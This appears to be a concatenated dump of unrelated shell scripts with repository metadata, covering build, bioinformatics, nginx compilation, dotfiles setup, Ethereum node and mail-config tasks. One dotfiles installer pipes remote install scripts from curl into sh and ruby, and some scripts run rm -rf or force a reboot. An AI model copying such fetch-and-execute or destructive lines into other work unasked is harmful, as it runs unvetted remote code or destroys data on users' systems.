# seems to be a transitive dependency of OpenSim (adolc)
# uses `aclocal` for configuration
brew install wget
# osc: docs dependencies
[[ ! -z ${OSC_BUILD_DOCS:+z} ]] && brew install python3
[[ ! -z ${OSC_BUILD_DOCS:+z} ]] && pip3 install --user wheel
[[ ! -z ${OSC_BUILD_DOCS:+z} ]] && pip3 install --user -r docs/requirements.txt
# ensure sphinx-build is available on this terminal's PATH
[[ ! -z ${OSC_BUILD_DOCS:+z} ]] && ls "$(python3 -m site --user-base)/bin"
[[ ! -z ${OSC_BUILD_DOCS:+z} ]] && export PATH=${PATH}:"$(python3 -m site --user-base)/bin"
echo "----- finished getting system-level dependencies -----"
else
echo "----- skipping getting system-level dependencies (OSC_SKIP_BREW) is
set -----"
fi
echo "----- PATH -----"
echo "${PATH}"
echo "----- /PATH -----"
echo "----- printing system (post-dependency install) info -----"
cc --version
c++ --version
cmake --version
make --version
[[ ! -z ${OSC_BUILD_DOCS:+z} ]] && sphinx-build --version # required when building docs
echo "----- building OSC's dependencies -----"
cmake \
-S third_party \
-B "osc-deps-build" \
-DCMAKE_BUILD_TYPE=${OSC_DEPS_BUILD_TYPE} \
-DCMAKE_INSTALL_PREFIX="osc-deps-install"
cmake \
--build "osc-deps-build" \
-j${OSC_BUILD_CONCURRENCY}
echo "----- building OSC -----"
cmake \
-S . \
-B "osc-build" \
-DCMAKE_BUILD_TYPE=${OSC_BUILD_TYPE} \
-DCMAKE_PREFIX_PATH="${PWD}/osc-deps-install" \
${OSC_BUILD_DOCS:+-DOSC_BUILD_DOCS=ON}
# build tests and the final package
cmake \
--build "osc-build" \
--target testopensimcreator testoscar ${OSC_BUILD_TARGET} \
-j${OSC_BUILD_CONCURRENCY}
# ensure tests pass
osc-build/tests/OpenSimCreator/testopensimcreator
osc-build/tests/oscar/testoscar
| true
|
c156542ffc5c93d19aa73a7ee2247d514634f1f4
|
Shell
|
lzlgboy/scRNASeqPipeline
|
/0_CRAM2BAM.sh
|
UTF-8
| 1,021
| 3.703125
| 4
|
[] |
no_license
|
#!/bin/bash
CRAM_file=$1
BAM_dir=$2
WORK_dir=$3 # fast I/O location with space to store genome & temporary files
export REF_CACHE=$WORK_dir
SAMTOOLS=/nfs/users/nfs_t/ta6/RNASeqPipeline/software/CRAM/samtools-1.3.1/samtools
# Checks
USAGE="Usage: 0_CRAM2BAM.sh cram_file bam_dir work_dir\n
\tArguments:\n
\tcram_file = CRAM file or directory of CRAM files if running in job array\n
\tbam_dir = directory to be filled with BAM files\n
\twork_dir = fast I/O location with space to store genome\n"
if [ -z $CRAM_file ] || [ -z $BAM_dir ] || [ -z $WORK_dir ] ; then
echo -e $USAGE
exit 1
fi
if [ ! -f $SAMTOOLS ] ; then
echo "$SAMTOOLS not available"
exit 1
fi
# Get all CRAM files
if [ ! -z $LSB_JOBINDEX ]; then
CRAMS=($CRAM_file/*.cram)
INDEX=$(($LSB_JOBINDEX-1))
FILE=${CRAMS[$INDEX]}
else
FILE=$CRAM_file
fi
NAME=`basename ${FILE%.cram}` #remove path and .cram suffix
cp $FILE $WORK_dir/$NAME.cram
$SAMTOOLS view -b -h $WORK_dir/$NAME.cram -o $BAM_dir/$NAME.bam
rm $WORK_dir/$NAME.cram
| true
|
8a40a100dfb21645c1d1c38f8e036cf248beadb9
|
Shell
|
oxinabox/oxinabox.github.io
|
/scripts/jupyter/run_nbconvert.sh
|
UTF-8
| 348
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash -x
jupyter nbconvert --to markdown "$1" --config jekyll_config.py --template=jekyll.tpl --Application.log_level='DEBUG'
outputname=$(basename "$1" .ipynb)
outputpath=${1%.ipynb}
postname=$(date +"%Y-%m-%d-")$(echo $outputname | tr " " -)
mv "$outputpath.md" "../../_posts/$postname.md"
mv "$outputname"_files ../../posts_assets/
| true
|
ccf1c236913d88f8873fd3abc8db2e2cb86cf6e1
|
Shell
|
seanjones2848/hercules
|
/mares_of_diomedes/catcher.sh
|
UTF-8
| 315
| 2.953125
| 3
|
[] |
no_license
|
./mangercentos & PID=$!
kill -14 $PID
echo "Dearest King, The horses have been coralled, would you like them tamedor to remain wild? (t/w)"
read ans
case $ans in
't') ./wild 0 & echo "Here are your tamed horses." ;;
'w') ./wild 1 & echo "You asked for it..." ;;
'*') echo "You failed to pick an option" ;;
esac
| true
|
69216bb6da38371e88e68cd0c088c89a543a3775
|
Shell
|
lop-old/xLemp
|
/src/compile_nginx.sh
|
UTF-8
| 2,103
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/sh
clear
source /usr/bin/shellscripts/common.sh
title 'Compiling Nginx..'
if [ "$(id -u)" != "0" ]; then
errcho 'This script must be run as root'
fi
# install mercurial if needed
if [ ! -f /usr/bin/hg ]; then
yum install -y mercurial
fi
# clone repo
if [ -d /usr/local/src/nginx/ ]; then
pushd /usr/local/src/nginx/
hg update --clean \
|| exit 1
popd
else
pushd /usr/local/src/
hg clone http://hg.nginx.org/nginx/ \
|| exit 1
popd
fi
# find nginx version
pushd /usr/local/src/nginx/
RELEASE=`hg tags | grep release-1.8. | head -n1 | awk -F' ' '{print $1}' | awk -F'-' '{print $2}'`
if [ -z $RELEASE ]; then
errcho 'Failed to find latest version!'
exit 1
fi
title "Nginx Version ${RELEASE}"
hg update "release-${RELEASE}" \
|| exit 1
popd
### prerequisites
# pcre
if [ ! -f /usr/include/pcre.h ]; then
yum install -y pcre pcre-devel || exit 1
fi
# zlib
if [ ! -f /usr/include/zlib.h ]; then
yum install -y zlib zlib-devel || exit 1
fi
# ssl
if [ ! -f /usr/include/openssl/ssl3.h ]; then
yum install -y openssl openssl-devel || exit 1
fi
# gcc/make
if [ ! -f /usr/bin/gcc ]; then
yum groupinstall -y 'Development Tools' || exit 1
fi
# compile
pushd /usr/local/src/nginx/
./auto/configure \
--prefix=/usr/local/nginx-${RELEASE} \
--conf-path=/etc/nginx/nginx.conf \
--error-log-path=/var/log/nginx/error.log \
--pid-path=/run/nginx.pid \
--lock-path=/var/lock/nginx.lock \
--http-log-path=/var/log/access.log \
--http-client-body-temp-path=/var/lib/nginx/tmp/client_body/ \
--http-proxy-temp-path=/var/lib/nginx/tmp/proxy/ \
--http-fastcgi-temp-path=/var/lib/nginx/tmp/fastcgi/ \
--http-uwsgi-temp-path=/var/lib/nginx/tmp/uwsgi/ \
--http-scgi-temp-path=/var/lib/nginx/tmp/scgi/ \
--user=nginx \
--group=nginx \
--without-http_ssi_module \
--with-http_ssl_module \
--with-http_stub_status_module \
|| exit 1
make || exit 1
make install || exit 1
popd
ln -sf "/usr/local/nginx-${RELEASE}/sbin/nginx" /usr/local/sbin/nginx \
|| exit 1
ls -l /usr/local/sbin/nginx
title "Nginx ${RELEASE} Successfully Installed!"
| true
|
bd88772d12adfc37858857696f634bea55606ede
|
Shell
|
rdkcmf/rdkb-raspberrypi-sysint
|
/lib/rdk/bank_image_switch.sh
|
UTF-8
| 2,406
| 3.28125
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-unknown"
] |
permissive
|
##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2019 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
#--------------------------------------------------------------------------------------------------
# Identify active bank ( either bank 0 or bank 1 ) or ( mmcblk0p2 or mmcblk0p3 )
#--------------------------------------------------------------------------------------------------
activeBank=`sed -e "s/.*root=//g" /proc/cmdline | cut -d ' ' -f1`
echo "Active bank partition is $activeBank"
bank1_partition_name=`fdisk /dev/mmcblk0 -l | tail -2 | cut -d' ' -f1 | head -n1`
storage_block_name=`fdisk /dev/mmcblk0 -l | tail -2 | cut -d' ' -f1 | tail -1`
mkdir -p /extblock
mount $storage_block_name /extblock
mkdir -p /extblock/bank0_linux
mount /dev/mmcblk0p1 /extblock/bank0_linux
if [ "$activeBank" = "$bank1_partition_name" ];
then
passiveBank=/dev/mmcblk0p2;
rm -rf /extblock/bank0_linux/*
cp -R /extblock/data_bkup_linux_bank0/* /extblock/bank0_linux/
# change cmdline.txt for bank0 linux to partition p2 or mmcblk0p2 which has to be active bank after reboot
sed -i -e "s|${activeBank}|${passiveBank}|g" /extblock/bank0_linux/cmdline.txt
else
passiveBank=$bank1_partition_name;
rm -rf /extblock/bank0_linux/*
cp -R /extblock/data_bkup_linux_bank1/* /extblock/bank0_linux/
# change cmdline.txt for bank0 linux to partition p2 or mmcblk0p2 which has to be active bank after reboot
sed -i -e "s|${activeBank}|${passiveBank}|g" /extblock/bank0_linux/cmdline.txt
fi
umount /extblock/bank0_linux
rm -rf /extblock/bank0_linux
umount /extblock
echo "Rebooting with bank switch ...."
reboot -f
| true
|
19bcbf3b1d7df92909ed1e3196734a63c84e1bd5
|
Shell
|
davegreig/dotfiles
|
/install.sh
|
UTF-8
| 940
| 3.203125
| 3
|
[] |
no_license
|
#! /bin/bash
# 0. Install oh-my-zsh
sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
# 1. Install Homebrew
if ! [ -x "$(command -v brew)" ]; then
echo -e "Downloading and installing Homebrew 🍺"
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
fi
# 2. Install all the brews
echo -e "\n🍻 Update Homebrew settings...\n"
brew analytics off
brew install $(<brew-list)
brew install --cash $(<brew-cask-list)
# 3. Install Powerlevel10k
git clone --depth=1 https://github.com/romkatv/powerlevel10k.git ${ZSH_CUSTOM:-$HOME/.oh-my-zsh/custom}/themes/powerlevel10k
## Manual step - set the theme
```Set ZSH_THEME="powerlevel10k/powerlevel10k" in ~/.zshrc.```
# 4. Setup MacOS preferences
./macos.sh
#5. Set up iTerm2
echo -e "\nCopying across iTerm2 Preferences...\n"
cp iTerm/itermProfile.json ~/Library/Application\ Support/iTerm2/DynamicProfiles
| true
|
316ac05cb358ed52fb2033b6c47a2a1c2f3ba19a
|
Shell
|
rsefer/dotfiles
|
/setup/functions.sh
|
UTF-8
| 1,991
| 4.125
| 4
|
[] |
no_license
|
BRACKETSTART="\r\n[ "
BRACKETEND=" ] "
LINEEND="\n"
COLOREND=$'\e[0m'
COLORRED=$'\e[31m'
COLORGREEN=$'\e[32m'
COLORYELLOW=$'\e[33m'
COLORBLUE=$'\e[34m'
message () {
printf "${BRACKETSTART}$3$2${COLOREND}${BRACKETEND}$1${LINEEND}"
}
plus () {
message "$1" "++" $COLORGREEN
}
success () {
message "$1" "OK" $COLORGREEN
}
minus () {
message "$1" "--" $COLORRED
}
fail () {
message "$1" "XX" $COLORRED
}
info () {
message "$1" ".." $COLORBLUE
}
user () {
message "$1" "??" $COLORYELLOW
}
readyn () {
user "$1"
read -n 1 -r
echo "\n"
}
link_file () {
local src=$1 dst=$2
local overwrite= backup= skip=
local action=
if [ -f "$dst" -o -d "$dst" -o -L "$dst" ]
then
if [ "$overwrite_all" == "false" ] && [ "$backup_all" == "false" ] && [ "$skip_all" == "false" ]
then
local currentSrc="$(readlink $dst)"
if [ "$currentSrc" == "$src" ]
then
skip=true;
else
user "File already exists: $dst ($(basename "$src")), what do you want to do?\n\
[s]kip, [S]kip all, [o]verwrite, [O]verwrite all, [b]ackup, [B]ackup all?"
read -n 1 action
case "$action" in
o )
overwrite=true;;
O )
overwrite_all=true;;
b )
backup=true;;
B )
backup_all=true;;
s )
skip=true;;
S )
skip_all=true;;
* )
;;
esac
fi
fi
overwrite=${overwrite:-$overwrite_all}
backup=${backup:-$backup_all}
skip=${skip:-$skip_all}
if [ "$overwrite" == "true" ]
then
rm -rf "$dst"
success "removed $dst"
fi
if [ "$backup" == "true" ]
then
mv "$dst" "${dst}.backup"
success "moved $dst to ${dst}.backup"
fi
if [ "$skip" == "true" ]
then
success "skipped $src"
fi
fi
if [ "$skip" != "true" ] # "false" or empty
then
ln -s "$1" "$2"
success "linked $1 to $2"
fi
}
| true
|
bfaa7903ad6f79bbe23b11936483a8746ab660d3
|
Shell
|
FutureTrust/gtsl
|
/docker/ethereum/src/start_geth.sh
|
UTF-8
| 2,359
| 3.890625
| 4
|
[] |
no_license
|
#!/bin/sh
GEN_ARGS=
echo "Running ethereum node with CHAIN_TYPE=$CHAIN_TYPE"
if [[ "$CHAIN_TYPE" == "private" ]]; then
# empty datadir -> geth init
DATA_DIR=${DATA_DIR:-"/root/.ethereum"}
echo "DATA_DIR '$DATA_DIR' non existant or empty. Initializing DATA_DIR..."
# check if keystore is empty
KEYSTORE="$(ls -A ${DATA_DIR}/keystore)"
COUNT_KEYSTORE="$(ls -A ${DATA_DIR}/keystore | wc -l )"
echo "You have ${COUNT_KEYSTORE} account(s)"
if [[ "$COUNT_KEYSTORE" -ge 2 ]]; then
echo "Keystore: "
echo "${KEYSTORE}"
else
if [[ "$ACCOUNT_NEW" == "true" ]]; then
echo "Generating new account(s)..."
PASSWORD="/opt/password"
if [[ -s ${PASSWORD} ]]; then
geth --datadir "$DATA_DIR" --password "$PASSWORD" account new
if [[ "$COUNT_KEYSTORE" -eq 0 ]]; then
geth --datadir "$DATA_DIR" --password "$PASSWORD" account new
fi
else
echo "Unable to create a new account: $PASSWORD file is missing or is empty."
exit
fi
else
echo "Unable to find an account, please add two existing account in data/keystore or enable to generate new account with ACCOUNT_NEW=true"
exit
fi
fi
# replace vars in genesis.json
if [[ ! -z ${GEN_NONCE} ]]; then
echo "Generating genesis.nonce from arguments..."
sed "s/\${GEN_NONCE}/$GEN_NONCE/g" -i /opt/genesis.json
fi
if [[ ! -z ${NET_ID} ]]; then
echo "Generating genesis.net_id from arguments..."
sed "s/\${NET_ID}/$NET_ID/g" -i /opt/genesis.json
fi
echo "Accounts:"
for f in "${DATA_DIR}"/keystore/* ; do
ACCOUNT=$(echo ${f} | awk -F'--' 'NR==1{print $3}')
echo "account: $ACCOUNT"
GEN_ALLOC=${GEN_ALLOC}'"'${ACCOUNT}'": { "balance": "0x2000000000000000000000000000000000000000000000000000000000000000" }, '
done
GEN_ALLOC=$(echo ${GEN_ALLOC} | sed 's/.$//')
echo "Generating genesis.alloc from accounts..."
sed "s/\${GEN_ALLOC}/$GEN_ALLOC/g" -i /opt/genesis.json
cat /opt/genesis.json
geth --datadir "$DATA_DIR" init /opt/genesis.json
GEN_ARGS="--datadir $DATA_DIR --nodiscover --identity miner --fast --cache=1024 --verbosity=3 --maxpeers=$MAX_PEERS --mine --minerthreads=4"
[[ ! -z ${NET_ID} ]] && GEN_ARGS="$GEN_ARGS --networkid=$NET_ID"
fi
echo "Running geth with arguments $GEN_ARGS $@"
exec geth ${GEN_ARGS} "$@"
| true
|
6ca04dafa2247c10a1e4a2ee103425b8e8f09f2f
|
Shell
|
dbalseiro/bin
|
/databases
|
UTF-8
| 807
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
servers=~/bin/pgservers
source ~/bin/selector.bash
function pedirdb() {
listabases=/tmp/listabases.$$.tmp
psql $connstr --list --tuples-only |
awk '$3 == "inscripcion_user" || $3 == "postgres" { print $1 }' > $listabases
mostrarlistado $listabases
while elegir $listabases abrirdb; do
echo "error"
done
}
function abrirdb() {
database=`cat $listabases | head -$1 | tail -1`
}
function ejecutar() {
local buffer="/tmp/$(basename $0).$$.sql"
database=
connstr=`cat $servers | cut -f2 -d"#" | head -$1 | tail -1 |
awk -F"@" '{ printf("-h %s -U %s", $2, $1) }'`
pedirdb
echo "-- $connstr -d $database" > $buffer
echo >> $buffer
(cd ~/git/gcaba-io/database/update-scripts/01.08.00 ; vim $buffer +)
}
main
| true
|
19160968317aca10b3fddf5d2893123d1f59564b
|
Shell
|
9001/copyparty
|
/scripts/rls.sh
|
UTF-8
| 1,338
| 3.5
| 4
|
[
"MIT",
"GPL-1.0-or-later"
] |
permissive
|
#!/bin/bash
set -e
parallel=1
[ -e make-sfx.sh ] || cd scripts
[ -e make-sfx.sh ] && [ -e deps-docker ] || {
echo cd into the scripts folder first
exit 1
}
v=$1
[ "$v" = sfx ] || {
printf '%s\n' "$v" | grep -qE '^[0-9\.]+$' || exit 1
grep -E "(${v//./, })" ../copyparty/__version__.py || exit 1
git push all
git tag v$v
git push all --tags
rm -rf ../dist
./make-pypi-release.sh u
(cd .. && python3 ./setup.py clean2)
./make-tgz-release.sh $v
}
rm -f ../dist/copyparty-sfx*
shift
./make-sfx.sh "$@"
f=../dist/copyparty-sfx
[ -e $f.py ] && s= || s=-gz
$f$s.py --version >/dev/null
[ $parallel -gt 1 ] && {
printf '\033[%s' s 2r H "0;1;37;44mbruteforcing sfx size -- press enter to terminate" K u "7m $* " K $'27m\n'
trap "rm -f .sfx-run; printf '\033[%s' s r u" INT TERM EXIT
touch .sfx-run
min=99999999
for ((a=0; a<$parallel; a++)); do
while [ -e .sfx-run ]; do
CSN=sfx$a ./make-sfx.sh re "$@"
sz=$(wc -c <$f$a$s.py | awk '{print$1}')
[ $sz -ge $min ] && continue
mv $f$a$s.py $f$s.py.$sz
min=$sz
done &
done
read
exit
}
while true; do
mv $f$s.py $f$s.$(wc -c <$f$s.py | awk '{print$1}').py
./make-sfx.sh re "$@"
done
# git tag -d v$v; git push --delete origin v$v
| true
|
f37be049546ca7c9b173b85038e90394331f8024
|
Shell
|
sroettger/35c3ctf_chals
|
/logrotate/skel/usr/sbin/update-exim4.conf.template
|
UTF-8
| 3,409
| 4.125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -e
CONFDIR="${CONFDIR:-/etc/exim4}"
DONOTRUN='true'
UPEX4CT_outputfile="${CONFDIR}/exim4.conf.template"
usage() {
cat <<EOF
$0 - Generate exim4 configuration file template
Options:
-n|--nobackup - Overwrite old template, do not take backup.
-o|--output file - write output to file instead of ${UPEX4CT_outputfile}
-h|--help - This message.
-r|--run - Actually do something
EOF
}
## Parse commandline
TEMP=$(getopt -n update-exim4.conf.template \
-l nobackup,output:,help,run -- \
+no:hr "$@")
if test "$?" != 0; then
echo "Terminating..." >&2
exit 1
fi
eval set -- ${TEMP}
while test "$1" != "--"; do
case $1 in
-h|--help)
usage
exit 0
;;
-o|--output)
shift
UPEX4CT_outputfile="$1"
;;
-n|--nobackup)
NOBACKUP=1
;;
-r|--run)
DONOTRUN='false'
;;
esac
shift
done
shift
# No non-option arguments allowed.
if [ "$#" -ne 0 ]; then
echo "No non option arguments ($@) allowed" >&2
usage >&2
exit 1
fi
# run-parts emulation, stolen from Branden's /etc/X11/Xsession
# Addition: Use file.rul instead if file if it exists.
run_parts () {
# reset LC_COLLATE
unset LANG LC_COLLATE LC_ALL
if [ -z "$1" ]; then
errormessage "$0: internal run_parts called without an argument"
fi
if [ ! -d "$1" ]; then
errormessage "$0: internal run_parts called, but $1 does not exist or is not a directory."
fi
for F in $(ls $1 | grep -v /.svn); do
if expr "$F" : '[[:alnum:]_-]\+$' > /dev/null 2>&1; then
if [ -f "$1/$F" ] ; then
if [ -f "$1/${F}.rul" ] ; then
echo "$1/${F}.rul"
else
echo "$1/$F"
fi
fi
fi
done;
}
# also from Branden
errormessage () {
# pretty-print messages of arbitrary length (no trailing newline)
echo "$*" | fold -s -w ${COLUMNS:-80} >&2;
}
cat_parts() {
if [ -z "$1" ]; then
errormessage "$0: internal cat_parts called without an argument"
fi
if [ ! -d "$1" ]; then
errormessage "$0: internal cat_parts called, but $1 does not exist or is not a directory."
fi
for file in $(run_parts $1); do
echo "#####################################################"
echo "### $file"
echo "#####################################################"
cat $file
echo "#####################################################"
echo "### end $file"
echo "#####################################################"
done
}
if [ "$DONOTRUN" = "true" ]; then
errormessage "This program overwrites conffiles. Do not run unless you have consulted the manpage." >&2
echo "Terminating..." >&2
exit 1
fi
if [ -e "${UPEX4CT_outputfile}" ] && [ -z "$NOBACKUP" ]; then
if [ -e "${UPEX4CT_outputfile}.bak.$$" ]; then
echo >&2 "ERR: ${UPEX4CT_outputfile}.bak.$$ already exists, aborting"
exit 1
fi
fi
NEWTEMPLATE=$(tempfile -m644 -p ex4)
if [ -f "${UPEX4CT_outputfile}" ] ; then
chmod --reference="${UPEX4CT_outputfile}" "$NEWTEMPLATE"
fi
# generate .template. Ugly - better alternative?
SAVEWD="$(pwd)"
cd ${CONFDIR}/conf.d
for i in main acl router transport retry rewrite auth ; do
cat_parts $i
done > "$NEWTEMPLATE"
cd "$SAVEWD"
if [ -e "${UPEX4CT_outputfile}" ] && [ -z "$NOBACKUP" ] ; then
mv "${UPEX4CT_outputfile}" \
"${UPEX4CT_outputfile}.bak.$$"
fi
mv "$NEWTEMPLATE" "${UPEX4CT_outputfile}"
| true
|
180de15a03a21fdc7879487c8a11b9b1f9531524
|
Shell
|
aganzai/xmwifi_sta
|
/run/wifi_run.sh
|
UTF-8
| 537
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/sh
if [ -n $NAME ]; then
NAME=centos_XM
fi
ifconfig ra0 down
sleep 1
modprobe -r mt7601Usta
sleep 1
killall wpa_supplicant
killall dhclient
sleep 1
modprobe mt7601Usta
rm -rf /var/run/wpa_supplicant/ra0
sleep 1
wpa_supplicant -c ./wpa_supplicant.conf -i ra0 -B
if [ ! -n $SSID ] || [ ! -n $PSK ]; then
wpa_cli remove_network 0
wpa_cli ap_scan 1
wpa_cli add_network
wpa_cli set_network 0 ssid $SSID
wpa_cli set_network 0 psk $PSK
wpa_cli select_network 0
wpa_cli list_networks
dhclient ra0 -H $NAME
fi
| true
|
7edf09930390d9d8588200ae743cd0fd700f6dc5
|
Shell
|
singhsaysdotcom/dotfiles
|
/scripts/bootstrap.sh
|
UTF-8
| 255
| 2.625
| 3
|
[] |
no_license
|
#!/bin/bash
if [[ $('uname') == 'Darwin' ]]; then
~/dotfiles/scripts/osx.sh
fi
echo "Creating symlinks ..."
ln -sf ~/dotfiles/vim ~/.vim
ln -sf ~/dotfiles/vim/vimrc ~/.vimrc
ln -sf ~/dotfiles/zshrc ~/.zshrc
ln -sf ~/dotfiles/tmux.conf ~/.tmux.conf
| true
|
8c5f3ace531741d2da9e03b33e7d9b080406139f
|
Shell
|
ryanwoodsmall/oldsysv
|
/sysvr4/svr4/cmd/portmgmt/port_quick/q-rm.sh
|
UTF-8
| 2,907
| 3.421875
| 3
|
[] |
no_license
|
# Copyright (c) 1990 UNIX System Laboratories, Inc.
# Copyright (c) 1984, 1986, 1987, 1988, 1989, 1990 AT&T
# All Rights Reserved
# THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF
# UNIX System Laboratories, Inc.
# The copyright notice above does not evidence any
# actual or intended publication of such source code.
#ident "@(#)portmgmt:port_quick/q-rm.sh 1.1.3.3"
# PURPOSE: Remove currently configured RS232 port
# ---------------------------------------------------------------------
STREAM="NULL"
REBOOT="NO"
cp /etc/conf/sdevice.d/asy /usr/tmp/Osdevice.d
cp /etc/conf/node.d/asy /usr/tmp/Onode.d
cp /etc/inittab /usr/tmp/Oinittab
cp /etc/saf/ttymon3/_pmtab /usr/tmp/pmtab
for i in $*
do
TTY=`echo $i | cut -c11-16`
if [ $TTY = 01 -o $TTY = 01s -o $TTY = 01h ]
then
grep -v "$TTY" /etc/conf/node.d/asy > /usr/tmp/node$$
cp /usr/tmp/node$$ /etc/conf/node.d/asy
rm -f /usr/tmp/node$$
REBOOT=YES
fi
grep "01h" /etc/conf/node.d/asy
RETURNh=$?
grep "01s" /etc/conf/node.d/asy
RETURNs=$?
if [ $RETURNs != 0 -a $RETURNh != 0 ]
then
grep -v "01" /etc/conf/node.d/asy > /usr/tmp/node$$
cp /usr/tmp/node$$ /etc/conf/node.d/asy
grep -v "asy Y 1 7 1 3 2f8 2ff 0 0" /etc/conf/sdevice.d/asy > /usr/tmp/sd$$
cp /usr/tmp/sd$$ /etc/conf/sdevice.d/asy
rm -f /usr/tmp/sd$$ /usr/tmp/node$$
REBOOT=YES
fi
if [ $TTY = 00 -o $TTY = 00s -o $TTY = 00h ]
then
grep -v "$TTY" /etc/conf/node.d/asy > /usr/tmp/node$$
cp /usr/tmp/node$$ /etc/conf/node.d/asy
rm -f /usr/tmp/node$$
REBOOT=YES
fi
# See if the device specifies is
# a streams or a clist based device.
# If it is clist then a getty is removed in inittab
# If it is not, then sacadm is used for ttymon.
# The isastream program will return a 1 for a stream device
# a 0 for a clist based device.
if [ $TTY = 01 -o $TTY = 01s $ -o $TTY = 01h ]
then
STREAM=YES
else
/usr/sadm/sysadm/bin/isastream /dev/term/$TTY
RET=$?
if [ $RET = 1 ]
then
STREAM=YES
else
if [ $RET = 0 ]
then
STREAM=NO
else
echo "Cannot open port $i.\n " >>/usr/tmp/ap.$VPID
continue
fi
fi
fi
if [ "$STREAM" = "NO" ]
then
trap '' 1 2 3 9 15
DOTTTY=$TTY
rm -f /etc/conf/init.d/ua_${TTY} /etc/conf/rc.d/boot_${TTY}
if [ -c /dev/${DOTTTY} ]
then
chmod 666 /dev/${DOTTTY}
chown root /dev/${DOTTTY}
chgrp sys /dev/${DOTTTY}
fi
trap '' 1 2 3 9 15
/etc/conf/bin/idmkinit -o /usr/tmp
cp /usr/tmp/inittab /usr/tmp/inittab$$
chown bin /usr/tmp/inittab$$
chgrp bin /usr/tmp/inittab$$
chmod 444 /usr/tmp/inittab$$
cp /usr/tmp/inittab$$ /etc/inittab
telinit q
echo "$i was successfully removed.\n" >>/usr/tmp/ap.$VPID:1
else
pmadm -r -p ttymon3 -s $TTY >/dev/null 2>&1
echo "$i was successfully removed.\n" >>/usr/tmp/ap.$VPID
fi
done
if [ $REBOOT = YES ]
then
rm -f /usr/tmp/Osdevice.d /usr/tmp/Onode.d /usr/tmp/pmtab
rm -f /usr/tmp/inittab$$ /usr/tmp/inittab /usr/tmp/Oinittab
/etc/conf/bin/idmknod > /dev/null 2>&1
fi
echo 0
exit 0
| true
|
269adc136ba7b11805a61f2db245725996be7110
|
Shell
|
sskafandri/Linux-Config
|
/configure_centos.sh
|
UTF-8
| 2,325
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
CWD="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
if [ ! -f /etc/redhat-release ]; then
echo "CentOS no detectado, abortando."
exit 0
fi
echo "Actualizando SO..."
yum update -y
yum groupinstall "Base" -y
yum install screen -y
sed -i 's/^SELINUX=.*/SELINUX=disabled/' /etc/sysconfig/selinux
sed -i 's/^SELINUX=.*/SELINUX=disabled/' /etc/selinux/config
/usr/sbin/setenforce 0
iptables-save > /root/firewall.rules
echo "Configurando Red..."
RED=$(route -n | awk '$1 == "0.0.0.0" {print $8}')
ETHCFG="/etc/sysconfig/network-scripts/ifcfg-$RED"
sed -i '/^PEERDNS=.*/d' $ETHCFG
sed -i '/^DNS1=.*/d' $ETHCFG
sed -i '/^DNS2=.*/d' $ETHCFG
echo "PEERDNS=no" >> $ETHCFG
echo "DNS1=8.8.8.8" >> $ETHCFG
echo "DNS2=8.8.4.4" >> $ETHCFG
echo "Reescribiendo /etc/resolv.conf..."
echo "nameserver 8.8.8.8" > /etc/resolv.conf # Google
echo "nameserver 8.8.4.4" >> /etc/resolv.conf # Google
echo "Configurando SSH..."
sed -i 's/^X11Forwarding.*/X11Forwarding no/' /etc/ssh/sshd_config
sed -i 's/#UseDNS.*/UseDNS no/' /etc/ssh/sshd_config
echo "Configurando FSCK..."
grubby --update-kernel=ALL --args=fsck.repair=yes
grep "fsck.repair" /etc/default/grub > /dev/null || sed 's/^GRUB_CMDLINE_LINUX="/&fsck.repair=yes /' /etc/default/grub
echo "Configurando Yum-Cron..."
yum -y install yum-cron
sed -i 's/^apply_updates.*/apply_updates = yes/' /etc/yum/yum-cron.conf
systemctl start yum-cron.service
echo "Configurando SSD (de poseer)..."
for DEVFULL in /dev/sg? /dev/sd?; do
DEV=$(echo "$DEVFULL" | cut -d'/' -f3)
if [ -f "/sys/block/$DEV/queue/rotational" ]; then
TYPE=$(grep "0" /sys/block/$DEV/queue/rotational > /dev/null && echo "SSD" || echo "HDD")
if [ "$TYPE" = "SSD" ]; then
systemctl enable fstrim.timer
fi
fi
done
echo "Sincronizando fecha con pool.ntp.org..."
ntpdate 0.pool.ntp.org 1.pool.ntp.org 2.pool.ntp.org 3.pool.ntp.org 0.south-america.pool.ntp.org
if [ -f /usr/share/zoneinfo/America/Buenos_Aires ]; then
echo "Seteando timezone a America/Buenos_Aires..."
mv /etc/localtime /etc/localtime.old
ln -s /usr/share/zoneinfo/America/Buenos_Aires /etc/localtime
fi
echo "Seteando fecha del BIOS..."
hwclock -r
echo "Instalando GIT..."
yum install git -y
echo "Finalizado!"
| true
|
3b481a0f7b63a1a6c773a4642076ff00067869fb
|
Shell
|
myanime/indeed_server
|
/macmans_cron.sh
|
UTF-8
| 351
| 2.578125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
COUNTRY='au'
echo "Poor Mans Cron"
sleep 5
echo "Starting"
osascript -e 'tell application "Terminal" to do script "/Users/ryan/repos/indeed_server/local_indeed.sh"'
while true
do
echo "Starting in 24hrs"
sleep 14400
osascript -e 'tell application "Terminal" to do script "/Users/ryan/repos/indeed_server/local_indeed.sh"'
done
| true
|
e69974897b3b31e13ea72093e7647c1476ec8ba3
|
Shell
|
hivesolutions/scudum
|
/scripts/build/extras/help2man.sh
|
UTF-8
| 365
| 3.265625
| 3
|
[
"Apache-2.0"
] |
permissive
|
